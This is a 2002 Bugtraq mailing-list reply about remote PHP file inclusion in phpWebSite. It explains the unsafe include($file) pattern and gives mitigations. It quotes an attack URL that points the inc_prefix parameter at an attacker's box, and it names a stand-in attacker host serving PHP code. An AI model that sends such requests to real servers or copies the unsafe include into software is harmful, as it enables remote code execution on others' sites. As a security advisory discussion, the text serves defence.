[27174] in bugtraq
Re: PHP source injection in phpWebSite
daemon@ATHENA.MIT.EDU (Matthias Bauer)
Tue Sep 24 15:37:28 2002
Message-ID: <3D8FB56B.6080302@moeffju.de>
Date: Tue, 24 Sep 2002 02:44:27 +0200
From: Matthias Bauer <moeffju@moeffju.de>
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Just as a side note, quite a lot of sites are open to this kind of
attacks, namely including files from other servers. fopen_wrappers and
unsafe programming are to blame here.
Lots of scripts do
include($file); // $file is in GPC
So if $file is "http://www.cracker.com/somefile.php" that file gets
included, and php code in it gets executed.
Easy workaround: disable fopen_wrappers in php.ini, or call file_exists
before including any file.
if (file_exists($file)) include($file);
Of course, the only "real" way to fix the bug is to program safely.
On 9/23/2002 1:53 AM Tim Vandermeersch wrote:
> If someone request a URL like
> http://SERVER/modsecurity.php?inc_prefix=http://MYBOX/,
> the htmlheader.php file from MYBOX would be included,
> and the attacker would be able to include any code he
> wants.
